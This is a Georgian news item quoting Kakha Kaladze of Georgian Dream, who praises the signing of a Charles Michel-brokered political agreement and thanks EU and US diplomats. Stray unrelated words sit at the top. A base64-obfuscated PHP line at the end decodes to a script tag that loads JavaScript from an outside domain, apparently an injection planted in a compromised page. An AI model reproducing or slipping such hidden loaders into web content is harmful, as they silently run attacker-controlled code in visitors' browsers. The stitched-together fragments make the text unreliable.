celsiusi
ავერსი შნაიდერი
საქართველოს მეგობრების, ჩვენი სტრატეგიული პარტნიორების ჩართულობით პოლიტიკური კრიზისის ეტაპი დასრულდა - ამ ხელმოწერით პროცესი დაიძრა, - აღნიშნული განცხადებით პრეზიდენტის სასახლეში, შარლ მიშელის ეგიდით გამოქვეყნებულ დოკუმენტზე ხელმოწერას პარტია “ქართული ოცნების“ გენერალური მდივანი კახა კალაძე ეხმაურება.
 
კალაძე იმედს გამოთქვამს, რომ “თითოეული პოლიტიკოსი, ამჯერად მაინც, სწორად დაალაგებს თავის პრიორიტეტებს ქვეყნის, ხალხის ინტერესების გათვალისწინებთ“.
 
„ჩვენ დაგვეხმარნენ, რომ ჰაერში გამოკიდებული პოლიტიკური ცხოვრება სწორ კალაპოტში მოქცეულიყო. ქვეყნის პოლიტიკური ცხოვრების სწორად წარმართვა ახლა თითოეული ჩვენგანის პასუხისმგებლობაა ქვეყნის დემოკრატიული განვითარების, საზოგადოებისა და ჩვენი ქვეყნის გულშემატკივრების წინაშე.
 
ვისურვებდი, დღევანდელი დღე მართლაც იქცეს “საქართველოს წინსვლის გზად" და ამისთვის მინდა, მადლობა გადავუხადო ჩვენი ქვეყნის მეგობრებს - ევროპული საბჭოს პრეზიდენტს შარლ მიშელს, მის პირად წარმომადგენელს კრისტიან დანიელსონს, ამერიკის შეერთებული შტატების ელჩს კელი დეგნანს, ევროკავშირის ელჩს, კარლ ჰარცელს, ყველას, ვინც ჩართული იყო მოლაპარაკებების პროცესში”, - წერს კალაძე “ფეისბუქის“ გვერდზე.
1281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");